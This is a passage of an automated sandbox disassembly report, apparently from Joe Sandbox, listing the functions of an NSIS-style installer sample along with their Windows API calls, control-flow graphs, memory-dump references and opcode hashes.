                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp$C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\StdUtils.dll$ExecShellAsUser
                                                                                                                                                                                              • API String ID: 1941528284-2496772727
                                                                                                                                                                                              • Opcode ID: ef34b70ba7e76013f08a8010c699c1fb49796a167d53f933b8375716ae072387
                                                                                                                                                                                              • Instruction ID: c6e8234c1d4b6e0ef99598e998ad36802638a9a190aaa2bd7459f070bf199d51
                                                                                                                                                                                              • Opcode Fuzzy Hash: ef34b70ba7e76013f08a8010c699c1fb49796a167d53f933b8375716ae072387
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9841B471900514BACF107BA5CD45DAF3A79EF05368F20423FF422B10E1DA3C86919A6E
                                                                                                                                                                                              Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 627 406624-406644 GetSystemDirectoryW 628 406646 627->628 629 406648-40664a 627->629 628->629 630 40665b-40665d 629->630 631 40664c-406655 629->631 633 40665e-406691 wsprintfW LoadLibraryExW 630->633 631->630 632 406657-406659 631->632 632->633
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                              • API String ID: 2200240437-1946221925
                                                                                                                                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                              • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                                                                                                                                              Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 634 403116-40312d 635 403136-40313f 634->635 636 40312f 634->636 637 403141 635->637 638 403148-40314d 635->638 636->635 637->638 639 40315d-40316a call 403331 638->639 640 40314f-403158 call 403347 638->640 644 403170-403174 639->644 645 40331f 639->645 640->639 646 4032ca-4032cc 644->646 647 40317a-4031c3 GetTickCount 644->647 648 403321-403322 645->648 649 40330c-40330f 646->649 650 4032ce-4032d1 646->650 651 403327 647->651 652 4031c9-4031d1 647->652 653 40332a-40332e 648->653 657 403311 649->657 658 403314-40331d call 403331 649->658 650->651 654 4032d3 650->654 651->653 655 4031d3 652->655 656 4031d6-4031e4 call 403331 652->656 659 4032d6-4032dc 654->659 655->656 656->645 668 4031ea-4031f3 656->668 657->658 658->645 666 403324 658->666 663 4032e0-4032ee call 403331 659->663 664 4032de 659->664 663->645 671 4032f0-4032f5 call 405e62 663->671 664->663 666->651 670 4031f9-403219 call 4067f5 668->670 676 4032c2-4032c4 670->676 677 40321f-403232 GetTickCount 670->677 675 4032fa-4032fc 671->675 678 4032c6-4032c8 675->678 679 4032fe-403308 675->679 676->648 680 403234-40323c 677->680 681 40327d-40327f 677->681 678->648 679->659 684 40330a 679->684 685 403244-40327a MulDiv wsprintfW call 405322 680->685 686 40323e-403242 680->686 682 403281-403285 681->682 683 4032b6-4032ba 681->683 688 403287-40328e call 405e62 682->688 689 40329c-4032a7 682->689 683->652 690 4032c0 683->690 684->651 685->681 686->681 686->685 694 403293-403295 688->694 693 4032aa-4032ae 689->693 690->651 693->670 695 4032b4 693->695 694->678 696 403297-40329a 694->696 695->651 696->693
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                                                              • String ID: ... %d%%
                                                                                                                                                                                              • API String ID: 551687249-2449383134
                                                                                                                                                                                              • Opcode ID: 791be84a4dbf0ce6e2b89685bbb0426d8c944effbebd544c9fcf1485a6d681ca
                                                                                                                                                                                              • Instruction ID: f437ad28db75119c3a693f92e670aa5c34007c7df9fe8e0debaece40423bbb79
                                                                                                                                                                                              • Opcode Fuzzy Hash: 791be84a4dbf0ce6e2b89685bbb0426d8c944effbebd544c9fcf1485a6d681ca
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D517D71900219DBDB10DF66EA44AAE7BB8AB04356F54417FEC14B72C0CB388A51CBA9
                                                                                                                                                                                              Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 697 401c1f-401c3f call 402c1f * 2 702 401c41-401c48 call 402c41 697->702 703 401c4b-401c4f 697->703 702->703 704 401c51-401c58 call 402c41 703->704 705 401c5b-401c61 703->705 704->705 708 401c63-401c7f call 402c1f * 2 705->708 709 401caf-401cd9 call 402c41 * 2 FindWindowExW 705->709 721 401c81-401c9d SendMessageTimeoutW 708->721 722 401c9f-401cad SendMessageW 708->722 720 401cdf 709->720 723 401ce2-401ce5 720->723 721->723 722->720 724 402ac5-402ad4 723->724 725 401ceb 723->725 725->724
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                              • Opcode ID: 3fb84e4798befa08d55ab41dd677560f87883767086f956b8989b4831fa63046
                                                                                                                                                                                              • Instruction ID: 1af55e8da281c8781352e9764615226c40e2312ccaecb42dabcb88ef8baddf82
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fb84e4798befa08d55ab41dd677560f87883767086f956b8989b4831fa63046
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889809B19
                                                                                                                                                                                              Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 728 4023e4-402415 call 402c41 * 2 call 402cd1 735 402ac5-402ad4 728->735 736 40241b-402425 728->736 737 402427-402434 call 402c41 lstrlenW 736->737 738 402438-40243b 736->738 737->738 740 40243d-40244e call 402c1f 738->740 741 40244f-402452 738->741 740->741 745 402463-402477 RegSetValueExW 741->745 746 402454-40245e call 403116 741->746 750 402479 745->750 751 40247c-40255d RegCloseKey 745->751 746->745 750->751 751->735
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp
                                                                                                                                                                                              • API String ID: 2655323295-2844774887
                                                                                                                                                                                              • Opcode ID: 108721b550a48034b2014e23eab57ec1314cfbc5d5ef1d2255c6534627125d58
                                                                                                                                                                                              • Instruction ID: a703f9f7a84a81219e2528cb215680d2185ac4e531b753f9c0eacf199e84c27d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 108721b550a48034b2014e23eab57ec1314cfbc5d5ef1d2255c6534627125d58
                                                                                                                                                                                              • Instruction Fuzzy Hash: AF118471D00104BEEB10AFA5DE89EAEBA74AB44754F11803BF504F71D1D7F48D409B29
                                                                                                                                                                                              Function 004057F1 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 753 4057f1-40583c CreateDirectoryW 754 405842-40584f GetLastError 753->754 755 40583e-405840 753->755 756 405869-40586b 754->756 757 405851-405865 SetFileSecurityW 754->757 755->756 757->755 758 405867 GetLastError 757->758 758->756
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                              • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                              • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                                                              • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                                                                                                                                              Function 00405C97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 759 405c97-405cb2 call 4062ba call 405c3a 764 405cb4-405cb6 759->764 765 405cb8-405cc5 call 40654e 759->765 766 405d10-405d12 764->766 769 405cd5-405cd9 765->769 770 405cc7-405ccd 765->770 772 405cef-405cf8 lstrlenW 769->772 770->764 771 405ccf-405cd3 770->771 771->764 771->769 773 405cfa-405d0e call 405b8f GetFileAttributesW 772->773 774 405cdb-405ce2 call 4065fd 772->774 773->766 779 405ce4-405ce7 774->779 780 405ce9-405cea call 405bdb 774->780 779->764 779->780 780->772
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(?,?,00464250,?,00405CAE,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420,00000000), ref: 00405C48
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                              • lstrlenW.KERNEL32(00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420,00000000), ref: 00405CF0
                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00464250,00464250,00464250,00464250,00464250,00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420), ref: 00405D00
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                              • String ID: PBF
                                                                                                                                                                                              • API String ID: 3248276644-3456974464
                                                                                                                                                                                              • Opcode ID: 1236b3014a845ece28ca986cac263987dd07c4e4a123605a37d0802bd6a8cdf3
                                                                                                                                                                                              • Instruction ID: 4e01e145a0ed536ad24acc563e8a85444835dd946e40d448b56664b374cc0476
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1236b3014a845ece28ca986cac263987dd07c4e4a123605a37d0802bd6a8cdf3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 21F0F43500DF6125F626333A1C45AAF2555CE82328B6A057FFC62B12D2DA3C89539D7E
                                                                                                                                                                                              Function 00405DDF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 782 405ddf-405deb 783 405dec-405e20 GetTickCount GetTempFileNameW 782->783 784 405e22-405e24 783->784 785 405e2f-405e31 783->785 784->783 786 405e26 784->786 787 405e29-405e2c 785->787 786->787
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,004CB000,0040338D,004DB000,004DF000,004DF000,004DF000,004DF000,004DF000,74DF3420,004035D9), ref: 00405E18
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.2197820596.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197886110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2197910663.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.2198266482.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                              • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                                                                              Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0), ref: 0040537D
                                                                                                                                                                                                • Part of subcall function 00405322: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 0040538F
